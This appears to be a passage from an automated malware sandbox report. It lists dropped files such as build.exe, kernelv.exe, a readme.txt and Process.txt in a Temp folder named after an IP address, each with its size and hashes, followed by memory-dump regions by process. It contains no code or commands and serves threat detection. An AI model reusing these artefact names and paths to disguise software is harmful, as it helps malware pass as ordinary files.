                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                            Filesize

                            4KB

                            MD5

                            aaafa9bad52c6b8832bfe6049e3ea677

                            SHA1

                            7c079d194986f77a65bfa3d8f22168e9b584f477

                            SHA256

                            bd4bdcc0eb7b4567b94b146b2c36c5e4c423eb3606475b795c64171591fc31aa

                            SHA512

                            3d5420df3a27cc8aa9902294b8ae5990e3bdb718a71dc1387546a4b6db444a46d9db25401a391a2c50e0bf528870366fd98144eb5d0ebeb6b4dc7ee64cb91b9b

                          • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                            Filesize

                            5KB

                            MD5

                            368d379c84bd87dc5750b0a91088f604

                            SHA1

                            3949b00b0abddba67fe05fb8f1c02b22c519eca4

                            SHA256

                            75e31026665a23adfaebf4ab95f2f5e45f59500c0dcc762502bb4a234b5dbcbf

                            SHA512

                            9074f42972b6e523ba89528d3a6b147ca5cafedb16920a612306a6c9bb764dd09320fb8d05df1aa34e85d72e59ab32d537900dffb86a00aadceec4ddd94150cd

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkdvpyjj.mwa.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\build.exe

                            Filesize

                            137KB

                            MD5

                            7605fb5c749eeea0b1b27fdaad78051c

                            SHA1

                            28388bf016af085bbcbacf8c516853942f6ec8d3

                            SHA256

                            466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

                            SHA512

                            1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

                          • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

                            Filesize

                            250KB

                            MD5

                            3252df0bec85cdcd3668d703ceaf09ce

                            SHA1

                            672366ae8df248c078db68a226d1fbf564d2f8ea

                            SHA256

                            02fa2665e5759db60b61da15b757150eda402ff6063a30a855a337d813fe8229

                            SHA512

                            179cab2e7d2cdc2cadc7a20986751007c10e6650069152df23d13bc1fef9fe5e066356f21825a325d34ea091c2b4e0766df1fabee8797da11a73de18dc46370f

                          • C:\Users\Admin\readme.txt

                            Filesize

                            780B

                            MD5

                            60d646f40556d78166ad8111d850fc51

                            SHA1

                            babaaf0762000dbf4b3f7a93beb35b6d9279d94d

                            SHA256

                            a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

                            SHA512

                            3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

                          • memory/2944-48-0x00000000007B0000-0x00000000007D8000-memory.dmp

                            Filesize

                            160KB

                          • memory/3396-16-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3396-15-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3396-12-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3396-11-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3396-10-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3396-0-0x00007FFE33433000-0x00007FFE33435000-memory.dmp

                            Filesize

                            8KB

                          • memory/3396-1-0x0000028AE9B40000-0x0000028AE9B62000-memory.dmp

                            Filesize

                            136KB

                          • memory/4880-143-0x00000000080A0000-0x0000000008646000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/4880-65-0x0000000007650000-0x00000000076E2000-memory.dmp

                            Filesize

                            584KB

                          • memory/4880-64-0x00000000072E0000-0x0000000007346000-memory.dmp

                            Filesize

                            408KB

                          • memory/4880-63-0x0000000006B40000-0x000000000706C000-memory.dmp

                            Filesize

                            5.2MB

                          • memory/4880-61-0x0000000005BC0000-0x0000000005D82000-memory.dmp

                            Filesize

                            1.8MB

                          • memory/4880-60-0x00000000059D0000-0x00000000059E2000-memory.dmp

                            Filesize

                            72KB

                          • memory/4880-59-0x0000000000F80000-0x0000000000FC4000-memory.dmp

                            Filesize

                            272KB

                          • memory/5088-31-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5088-27-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5088-18-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

                            Filesize

                            10.8MB